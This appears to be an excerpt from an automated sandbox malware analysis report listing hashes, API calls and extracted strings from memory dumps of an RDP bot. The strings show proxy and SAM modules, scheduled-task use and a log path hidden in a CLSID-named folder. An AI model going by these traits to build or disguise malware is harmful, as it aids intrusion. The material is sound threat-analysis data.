                  • Opcode Fuzzy Hash: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
                  • Instruction Fuzzy Hash: 7B416AB1A08683A5FA10CB15E9403F86361EF44B88F458537DACD0A5B6EF3DE68AC340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                  • API String ID: 1004003707-693788558
                  • Opcode ID: 0a7fdaa9b34be5affa01a48b6893dbe9fa356ce20ec0ea3afa8898849d8898d0
                  • Instruction ID: 1454c429e4ce94ff460e97266498300c4d695e0e5d86476253619da2d821f2be
                  • Opcode Fuzzy Hash: 0a7fdaa9b34be5affa01a48b6893dbe9fa356ce20ec0ea3afa8898849d8898d0
                  • Instruction Fuzzy Hash: 89414F61A08E4791FF108B82ED007F66268BF503B8F8450B6DA0E0A5B5DF7CFA85C701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                  • API String ID: 285244410-3859226547
                  • Opcode ID: b8c435b17a6ef23cfb8460f78b217bff15c05e77e3db55a1d2b9b66e6430e794
                  • Instruction ID: e0455db42af4a6b8e0a742d7b540ca3990b7d7e06c9bfb3cea2d5043c5d00940
                  • Opcode Fuzzy Hash: b8c435b17a6ef23cfb8460f78b217bff15c05e77e3db55a1d2b9b66e6430e794
                  • Instruction Fuzzy Hash: 5D31F960A0DE0391FB529B57E8A03B8336AAF44BB4F4485B9D90D4B3B5EF2DE945C301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                  • API String ID: 285244410-3859226547
                  • Opcode ID: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
                  • Instruction ID: 81237b5a8cbeaa394d6effe3b18185732daf2eb2999510cf525084fec6dbfd63
                  • Opcode Fuzzy Hash: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
                  • Instruction Fuzzy Hash: FF314BA6F0DB0781FA70AF45E8507B52361EF40B84F48A535D9DD4B3B4EE6CA886CB41
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                  • API String ID: 285244410-3859226547
                  • Opcode ID: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
                  • Instruction ID: f809e5bcf29454bc53b3a8097ba045c2767ebd1db967445710e23fdffe2e75d2
                  • Opcode Fuzzy Hash: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
                  • Instruction Fuzzy Hash: 63310761F0EA17A1FA109B15E8503B523B1BF44B84F598537CCDD5B2B6EE2CA945C340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                  • API String ID: 285244410-3859226547
                  • Opcode ID: 5f505093072f9111e4430611d5cc52738c1ec3e9a09dee5057f21a5072703155
                  • Instruction ID: 853aad9ade9044f4636b20f2e699d0d7bd6b47f6383d24d34c5554e128a99255
                  • Opcode Fuzzy Hash: 5f505093072f9111e4430611d5cc52738c1ec3e9a09dee5057f21a5072703155
                  • Instruction Fuzzy Hash: D6310561E0DE1781FF119B86EC403FB6269AF45BB0F8895B1C85D1B3B4EE2DB9858340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                  • API String ID: 3179112426-3318474754
                  • Opcode ID: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
                  • Instruction ID: ed68d24cb66e49d7caeb881e0ffb7285cc576de9af170e7eaab7acede10a531b
                  • Opcode Fuzzy Hash: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
                  • Instruction Fuzzy Hash: 3731E6B1E1C767E2FB345F55A5C03B82260EF49344E641133C6DE4A2B2DF5DA985DB02
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                  • API String ID: 3179112426-2019511216
                  • Opcode ID: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
                  • Instruction ID: c637efb9595c78f8449e50da212b71eccb3b25cf6f4bd80c1af265ce5ffb3c6c
                  • Opcode Fuzzy Hash: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
                  • Instruction Fuzzy Hash: ED31E860F0C70B82FB205714A4D03B92263BF09744FA41937C5DE462F7DEAEA9859755
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strcpy
                  • String ID: *$schtasks
                  • API String ID: 2790333442-2394224502
                  • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                  • Instruction ID: f3d49086abe0829a7808295de86a5ab0a7ac2979fc000f2a611be899a0925c01
                  • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                  • Instruction Fuzzy Hash: A5510912B0CE8386F7619AA7A8913FD6359AF843A4F4801B9DA4E473F6DE3DD9048300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                  • API String ID: 513531256-4171087551
                  • Opcode ID: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                  • Instruction ID: e6416c27ae5a11cd87c75af9e85f63e853512b5f7aba88e6b1d27e121130d34f
                  • Opcode Fuzzy Hash: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                  • Instruction Fuzzy Hash: 5641AF61A0C741CAF325BB19E8513AAF261BB857C0FE440B8DA4DC3795CF3CE9869760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2069802722
                  • Opcode ID: cd842bbf93fc22e180acf29d7a32dde013ceaa6f021aa54525153110a013c35c
                  • Instruction ID: 66626f3f86ff5ba62362b77ec4f4b7f0a18de9e35d66f7c756fa58a7522724f0
                  • Opcode Fuzzy Hash: cd842bbf93fc22e180acf29d7a32dde013ceaa6f021aa54525153110a013c35c
                  • Instruction Fuzzy Hash: 13219F21608E4395E7129F96F8407AA3369FB447A8F444176EE8D47774DF7CE989C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2069802722
                  • Opcode ID: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
                  • Instruction ID: 2af4fb2fc3beef764780ee551f62c638ddbc67e40f08003402780adadefd688d
                  • Opcode Fuzzy Hash: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
                  • Instruction Fuzzy Hash: 3C215762A08B4796E6329F19F8407AA33A4EB85794F444032EEDC477B5DF3CE985CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2069802722
                  • Opcode ID: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
                  • Instruction ID: a0f4585151e7d89a01ac7b80dbb5c4765a4e07935952c2e35098b0c435e8e8c3
                  • Opcode Fuzzy Hash: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
                  • Instruction Fuzzy Hash: 6A21AB62A08A8795E7109F59F8407AA7361FB88B88F444033EECD47675DF3CE949C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2069802722
                  • Opcode ID: 3fd9e565cbf0a0b73623f0fd5ed6820d7f93ff00c62f70379f5a601540ffba6b
                  • Instruction ID: a80b89ed3d44cbffa10236af6bc9cef5b4c344af25bd96bc5d77983951c0607f
                  • Opcode Fuzzy Hash: 3fd9e565cbf0a0b73623f0fd5ed6820d7f93ff00c62f70379f5a601540ffba6b
                  • Instruction Fuzzy Hash: 33218B21608E4686E7519F96FC40BAB3368EB447A4F845072EE4C47674DF3CE885C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                  • API String ID: 1004003707-2568489879
                  • Opcode ID: 3efd7ce7fdcbaaf3a8623d6d446461746211eb524509febaaa438a555a75a2e6
                  • Instruction ID: 86ed2bcfc96ae1c88862fbdb33b44b2de2b917c2bd9018ce23de97590aadee99
                  • Opcode Fuzzy Hash: 3efd7ce7fdcbaaf3a8623d6d446461746211eb524509febaaa438a555a75a2e6
                  • Instruction Fuzzy Hash: E9414F61A08E4791FB119B97ED403F83369BF04368F8445BAD98E061B5EF7CEA49C310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                  • API String ID: 1004003707-3977765790
                  • Opcode ID: b905e67c97e000c7d0be37e2307b797af4b7c8133c469d1a1c9126d58ad036d7
                  • Instruction ID: ec6f79c933c62fd5d640829baf755df0c4634c70fca91de25c289f6ebe04ace2
                  • Opcode Fuzzy Hash: b905e67c97e000c7d0be37e2307b797af4b7c8133c469d1a1c9126d58ad036d7
                  • Instruction Fuzzy Hash: 21417761E08D8795FB118B97E8403F82369BF003A8F4541BADD8D065B5EF7CE649C310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                  • API String ID: 1004003707-3977765790
                  • Opcode ID: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
                  • Instruction ID: ab49d71ce59add776440cfaa352fa51808657bed9c795a525127525b74806d73
                  • Opcode Fuzzy Hash: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
                  • Instruction Fuzzy Hash: 75413AA2A09747D1FA359F54E8403F463A0FF40748F488532EA9D5A5F5EF7CA989CB40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                  • API String ID: 39653677-1686225151
                  • Opcode ID: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                  • Instruction ID: 792e64ed8c8f6e79ea851aa484168d8aac2e5266af4fab5932e267b8674475c7
                  • Opcode Fuzzy Hash: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                  • Instruction Fuzzy Hash: 93210B12A0CF43C9FB297B19591437DB5554F657C8FA480B8DE0EDB792DD2CE8508360
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
